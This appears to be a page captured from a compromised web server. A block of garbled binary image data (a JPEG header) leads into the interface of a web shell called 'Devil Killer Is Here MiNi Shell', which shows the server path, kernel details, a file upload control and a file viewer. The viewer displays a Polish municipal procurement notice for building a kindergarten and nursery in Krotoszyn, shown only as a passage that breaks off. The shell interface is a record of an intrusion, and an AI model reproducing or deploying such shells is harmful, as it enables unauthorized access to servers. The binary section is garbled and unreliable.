JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230314/0013538901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa przedszkola i żłobka w Krotoszynie – etap I </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO I GMINA KROTOSZYN</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250854872</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kołłątaja 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krotoszyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 62 722 74 54</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@um.krotoszyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.um.krotoszyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa przedszkola i żłobka w Krotoszynie – etap I </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-afecdbc9-c249-11ed-b311-9aae6ad31be8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00135389</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00059921/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa przedszkola i żłobka w Krotoszynie - etap I</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-afecdbc9-c249-11ed-b311-9aae6ad31be8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1 Informacje ogólne<br/>1.1 Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, dostępnej pod adresem<br/>https://ezamowienia.gov.pl/,<br/>1.2 Zamawiający wyznacza do kontaktu: Małgorzata Wójcik, Marzena Kurek - tel. 62 722 74 54/34, e-mail: zp@um.krotoszyn.pl.<br/>1.3 Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz zakładka „Centrum Pomocy”.<br/>1.4 Ofertę, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe oraz inne oświadczenia i dokumenty, składane przez Wykonawcę w postępowaniu sporządza się w szczególności w formatach .pdf, doc, .docx, .odt, .txt, .rtf, xml. Zaleca się format .pdf.<br/>1.5 Sposób sporządzenia dokumentów elektronicznych, musi być zgodny z rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.20 r. w spr. sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniem Ministra Rozwoju Pracy i Technologii z dnia 23.12.20 r. w spr. podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>1.6 Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16.04.93 r. o zwalczaniu nieuczciwej konkurencji wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym pliku wraz z zaznaczeniem w nazwie „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>2 Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert).<br/>2.1 Komunikacja w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy dostępnych w zakładce „Formularze”. Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Umożliwiają one również dołączenie załącznika do przesyłanej wiadomości („dodaj załącznik”).<br/>W przypadku załączników, które są zgodnie z ustawą PZP lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym.<br/>2.2 Możliwość korzystania z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” oraz zalogowania się. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego.<br/>2.3 Wszystkie wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>2.4 Max. rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB.<br/>2.5 Min. wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje<br/>dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>2.6 W przypadku problemów technicznych i awarii związanych z funkcjonowaniem platformy użytkownicy mogą skorzystać ze<br/>wsparcia technicznego udostępnionego na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem” lub pod nr tel.<br/>22 458 77 99.<br/>2.7 Komunikacja Zamawiającego i Wykonawcy odbywać się będzie za pośrednictwem Platformy e-Zamówienia, w uzasadnionych<br/>przypadkach uniemożliwiających komunikację stron, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na<br/>adres e-mail: zp@um.krotoszyn.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem Danych Osobowych jest Miasto i Gmina Krotoszyn z siedzibą przy ul. Kołłątaja 7, 63-700 Krotoszyn, e-mail:<br/>um@krotoszyn.pl, numer telefonu: 62 725 42 01;<br/>2. Inspektorem Ochrony Danych w Urzędzie Miejskim w Krotoszynie jest Pan Arkadiusz Brodziak, z którym można się kontaktować<br/>pisemnie, za pomocą poczty tradycyjnej na adres: Urząd Miejski w Krotoszynie, ul. Kołłątaja 7, 63-700 Krotoszyn lub e-mail:<br/>iod@um.krotoszyn.pl, numer telefonu: 62 725 42 01;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z w/w postępowaniem o udzielenie zamówienia publicznego<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710, ze<br/>zm.), dalej „ustawa PZP”;<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy PZP;<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>8. Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w<br/>art. 18 ust. 2 RODO **;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9. Nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia stanowi realizacja budowa przedszkola i żłobka w Krotoszynie – etap I. Inwestycja będzie<br/>realizowana w oparciu o dokumentację projektową pn. „Budowa przedszkola i żłóbka w Krotoszynie”.<br/>1.1. Określenie przedmiotu zamówienia :<br/>- realizacja I etapu budowy przedszkola i żłobka w Krotoszynie o powierzchni użytkowej 2363,73 m2 w tzw. stanie<br/>„deweloperskim” wraz z budową przyłączy do wszystkich niezbędnych mediów. Przewiduje się wykonanie stanu surowego<br/>zamkniętego, elewacji, części instalacji sanitarnych, elektrycznych i teletechnicznych oraz częściowo prac<br/>wykończeniowych. Obiekt docelowo będzie zapewniał 270 miejsc dla dzieci w przedszkolu (11 oddziałów w tym 1 oddział<br/>integracyjny) oraz 40 miejsc dla dzieci w żłobku (2 oddziały). Projektowane postanowienia umowy stanowią cz. II SWZ.<br/>Opis przedmiotu zamówienia stanowi cz. III SWZ.<br/>1.2. Miejsce realizacji zamówienia: działki o numerze ewidencyjnym: 2127/3, 2182/3 i 2182/6, pomiędzy ulicami Staszica<br/>oraz Łąkową, m. Krotoszyn, Wielkopolska.<br/>1.3. Całość robót związana z wykonaniem w/w zamówienia zostanie wykonana zgodnie z Projektem budowlanym,<br/>Specyfikacją Techniczną Wykonania i Odbioru Robót, niniejszą Specyfikacją, przepisami Prawa budowlanego, przepisami<br/>BHP, oraz warunkami zawartego Kontraktu na roboty budowlane zgodnie z warunkami kontraktowymi FIDIC zawartymi w<br/>części II do SWZ Projektowane postanowienia umowy - Warunki Kontraktowe dla Budowy dla robót inżynieryjno –<br/>budowlanych projektowanych przez Zamawiającego – 4 wydanie angielsko-polskie niezmienione 2008 (tłumaczenie 1<br/>wydania FIDIC 1999) Stowarzyszenie Inżynierów Doradców i Rzeczoznawców SIDiR.<br/>1.4. Realizacja inwestycji finansowana będzie ze środków Rządowego Funduszu POLSKI ŁAD: Program Inwestycji<br/>Strategicznych Edycja 2.<br/>Wstępna promesa dofinansowania inwestycji stanowi załącznik A do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45214100-1 - Roboty budowlane w zakresie budowy przedszkolnych obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień polegających na powtórzeniu podobnych robót budowlanych w oparciu o art. 214 ust. 1 pkt 7) w związku z art. 305 pkt 1) ustawy PZP do 30 % wartości zamówienia podstawowego, zgodnych z przedmiotem podstawowym, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, a całkowita wartość zamówienia (podobnego) została uwzględniona przy obliczaniu jego wartości. <br/>Warunki udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 : <br/>1)	Wszczęcie postępowania nastąpi poprzez przekazanie Wykonawcy zamówienia podstawowego zaproszenia do negocjacji. Zaproszenie do negocjacji zawierać będzie informacje niezbędne do przeprowadzenia postępowania – w tym zakres zamówienia, opis zamówienia, proponowany termin realizacji. Zaproszenie zawierać będzie także projektowane postanowienia przyszłej umowy.<br/>Zamawiający umieści w BZP ogłoszenie o zamiarze zawarcia umowy.<br/>2) Zamawiający– nie później niż wraz z zawarciem umowy żądać będzie od Wykonawcy - oświadczenia o spełnianiu warunków udziału oraz niepodleganiu wykluczeniu z postępowania – w zakresie wykluczenia analogicznie jak w przedmiotowym postępowaniu oraz podmiotowych środków dowodowych.<br/>3) Zamawiający będzie prowadził z Wykonawcą negocjacje w zakresie treści przyszłej umowy, zwłaszcza w kwestii dotyczącej wynagrodzenia. Wykonawca wyceni roboty budowlane w oparciu o otrzymane informacje i na podstawie stawek Sekocenbudu obowiązujących w danym okresie dla województwa wielkopolskiego. Zamawiający sprawdzi wycenę i zaakceptuje ją albo wniesie uwagi. Pozostałe kwestie uzgadniane będą analogicznie. <br/>4) Po negocjacjach Strony zawrą umowę, a Zamawiający zamieści w BZP ogłoszenie o wyniku postępowania.<br/>Przewidywany zakres zamówienia podobnego obejmować będzie:<br/>o	Roboty wykończeniowe<br/>o	Tynki<br/>o	Ścianki działowe<br/>o	Dach<br/>o	Elewacja<br/>o	Klatka schodowa i szyb windowy <br/>o	Instalacje sanitarne<br/>o	Instalacje elektryczne<br/>o	Instalacje teletechniczne</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert (dot. ofert niepodlegających odrzuceniu):<br/>1. Cena oferty brutto (C) – waga kryterium 60 %;<br/>C = cena najniższa brutto*/cena oferty ocenianej brutto x 100 pkt x 60%<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>2. Doświadczenie Kierownika Budowy (DK) – waga kryterium 20%<br/>Zamawiający w niniejszym kryterium przyzna maksymalnie - 20 pkt.<br/>Zamawiający przyzna punkty za doświadczenie zawodowe obejmujące sprawowanie funkcji kierownika budowy, kierownika robót przy realizacji zadań z zakresu budowy (w rozumieniu art. 3 pkt 6 ustawy z dn. 07.07.1994 r. - Prawo budowlane) obiektów kubaturowych o wartości nie mniejszej niż 2 000 000 zł brutto każde zadanie.<br/>Ilość zrealizowanych zadań oraz punktacja za doświadczenie Kierownika Budowy (DK):<br/>Realizacja 1 zadania - 10 pkt.<br/>Realizacja 2 zadań - 15 pkt.<br/>Realizacja 3 lub więcej zadań - 20 pkt.<br/>3. Okres gwarancji<br/>Zamawiający w niniejszym kryterium przyzna maksymalnie - 20 pkt.<br/>3 lata - 10 pkt.<br/>4 lata - 20 pkt.<br/>II. Za ofertę najwyżej ocenioną zostanie uznana ta oferta, która – po zsumowaniu liczby punktów uzyskanych we wskazanych wyżej kryteriach – uzyska najwyższą liczbę punktów. Obliczenia w poszczególnych kryteriach dokonane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60.00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika Budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20.00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20.00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Sytuacja ekonomiczna lub finansowa<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wskaże że :<br/>1. posiada środki finansowe lub zdolność kredytową na kwotę minimum 4 000 000 PLN.<br/>Zdolność techniczna lub zawodowa<br/>Zamawiający uzna warunek za spełniony jeśli Wykonawca wskaże, że:<br/>1/. zrealizował (zakończył) z należytą starannością, nie wcześniej niż w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej 1 zadanie polegające na budowie (w rozumieniu art. 3 pkt 6 ustawy z dn. 07.07.1994 r. - Prawo budowlane) obiektu kubaturowego użyteczności publicznej lub obiektu budownictwa mieszkaniowego o wartości nie mniejszej niż 2 000 000 zł brutto, wraz z podaniem jego rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te<br/>roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>Przez ww. zadanie rozumie się roboty 